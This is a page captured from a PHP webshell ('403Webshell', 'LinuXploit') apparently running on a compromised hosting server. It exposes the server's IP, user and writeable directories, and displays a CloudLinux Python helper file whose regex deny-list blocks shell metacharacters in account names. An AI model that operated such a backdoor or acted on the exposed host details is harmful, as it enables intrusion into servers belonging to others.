403Webshell
Server IP : 213.136.93.164  /  Your IP : 216.73.216.104
Web Server : Apache
System : Linux m14200.contabo.net 5.14.0-611.54.1.el9_7.x86_64 #1 SMP PREEMPT_DYNAMIC Wed May 6 18:03:03 EDT 2026 x86_64
User : ki692510 ( 1047)
PHP Version : 7.4.33
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /opt/cloudlinux/venv/lib64/python3.11/site-packages/clcommon/public_hooks/lib/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /opt/cloudlinux/venv/lib64/python3.11/site-packages/clcommon/public_hooks/lib/helpers.py
# -*- coding: utf-8 -*-
# Copyright © Cloud Linux GmbH & Cloud Linux Software, Inc 2010-2018 All Rights Reserved
#
# Licensed under CLOUD LINUX LICENSE AGREEMENT
# http://cloudlinux.com/docs/LICENSE.TXT
#
import argparse
import inspect
import logging
import os
import re
import sys

import raven
import time
from io import StringIO
from contextlib import contextmanager
from functools import wraps

logger = logging.getLogger(__name__)


def _sanitize_log_value(value):
    """Strip control characters from a value before logging."""
    return str(value).replace('\n', '\\n').replace('\r', '\\r')


LISTENERS_DIRECTORY = '/usr/share/cloudlinux/hooks/listeners/'

# Hosting account / panel-owner name validator.
#
# Deny-list of dangerous characters, expressed as a negated character class.
# The previous allow-list `^[a-z_][a-z0-9._-]{0,31}$` (MR !30) over-narrowed:
# it rejected non-ASCII reseller/owner names that Plesk legitimately produces
# (e.g. `реселлер4` in lve-utils' Plesk i18n fixtures), which broke
# lve-utils.python_tests.test_cpapi_plesk on Plesk and stalled the nightly
# (CLOS-4470). Same threat model is still covered: control chars, whitespace,
# path separators, and shell metacharacters are rejected.
#
# Forbidden:
#   * `\x00-\x1f` and `\x7f`     C0/C1 control chars and DEL
#                                (log-line breaks, terminal escapes)
#   * `\s`                       whitespace
#                                (CLI-arg ambiguity, log-line breaks)
#   * `/` `\`                    path separators
#                                (path traversal inside listener scripts)
#   * `; & | \` $ ( ) < > ' "    shell metacharacters
#     `! * ? [ ] { } ~`          (command injection if a listener spawns a
#                                shell; glob/brace/history expansion)
#
# Length 1..255 (matches typical filesystem NAME_MAX; generous for any panel).
# All other Unicode codepoints are allowed.
_VALID_NAME_RE = re.compile(
    r"\A[^\s/\\;&|`$()<>'\"!*?\[\]{}~\x00-\x1f\x7f]{1,255}\Z"
)


def valid_name(value):
    """argparse type-callback for hosting account / panel-owner names.

    Used by post_modify_user.py, pre_modify_user.py, post_modify_admin.py,
    and post_modify_domain.py to reject values that contain shell
    metacharacters, path separators, control chars, or whitespace before
    dispatching to listener plugins.

    Accepts any Unicode string of length 1..255 that does not contain a
    forbidden character — see `_VALID_NAME_RE` above for the full list.
    """
    if not isinstance(value, str) or not _VALID_NAME_RE.fullmatch(value):
        raise argparse.ArgumentTypeError(
            f'invalid name {value!r}: contains forbidden character or has '
            f'length outside 1..255')
    return value


@contextmanager
def capture_output(stdo, stde):
    stdout = sys.stdout
    stderr = sys.stderr
    try:
        sys.stdout = stdo or StringIO()
        sys.stderr = stde or StringIO()
        yield
    finally:
        sys.stdout = stdout
        sys.stderr = stderr


def hook_method(func):
    """
    Magic decorator that calls all subclass methods
    that override base decorated one.
    Requirements:
    - subclass must be defined in .py file in LISTENERS_DIRECTORY
    - subclass must NOT start with '_' char
    - subclass must override base event method (the one with '@hook_method')
    """
    @wraps(func)
    def _wrapped(self, *args, **kwargs):
        # this only return direct subclasses, so we can't make `proxies` now
        for subclass in self.__class__.__subclasses__():
            listener_path = os.path.dirname(inspect.getmodule(subclass).__file__)
            # skip child if it is not in expected directory
            if os.path.normpath(LISTENERS_DIRECTORY) != os.path.normpath(listener_path):
                logger.warning('%s is not in %s directory; it is in %s,'
                               ' skip', subclass, LISTENERS_DIRECTORY, listener_path)
                continue
            # skip internal classes
            if subclass.__name__.startswith('_'):
                continue

            # magic: get method only if it is defined in child (NOT in parent)
            listener = getattr(subclass(), func.__name__)
            if getattr(listener, 'is_magic_method', False):
                logger.debug('skip %s is not implemented in %s',
                             func.__name__, subclass.__name__)
                continue

            logger.info('executing %s:%s', func.__name__, subclass.__name__)
            now = time.time()
            stdout, stderr = StringIO(), StringIO()
            try:
                with capture_output(stdout, stderr):
                    listener(*args, **kwargs)
            except Exception:
                # use Raven carefully and only in places where
                # you sure that sentry is already initialized
                raven.base.Raven.captureException(
                    fingerprint=['{{ default }}', subclass.__name__, func.__name__],
                    extra={'stdout': stdout.getvalue(), 'stderr': stderr.getvalue()}
                )
                logger.warning('listener %s:%s crashed', subclass.__name__, func.__name__, exc_info=1)
            finally:
                elapsed = time.time() - now
                stdout_str = stdout.getvalue()
                if stdout_str:
                    logger.info('captured stdout of %s:%s\n~BEGIN OUTPUT~\n%s\n~END OUTPUT~\n',
                                func.__name__, subclass.__name__, stdout_str)
                stderr_str = stderr.getvalue()
                if stderr_str:
                    logger.debug('captured stderr of %s:%s\n~BEGIN OUTPUT~\n%s\n~END OUTPUT~\n',
                                 func.__name__, subclass.__name__, stderr_str)
                logger.debug('running %s: %.4f elapsed', func.__name__, elapsed)
        logger.info('%s executed by the user with uid %s and gid %s',
                    func.__name__, os.geteuid(), os.getegid())
        logger.info('ended %s(%s, %s)', func.__name__,
                    _sanitize_log_value(args), _sanitize_log_value(kwargs))

    # special marker to determine overrided methods
    _wrapped.is_magic_method = True
    return _wrapped

Youez - 2016 - github.com/yon3zu
LinuXploit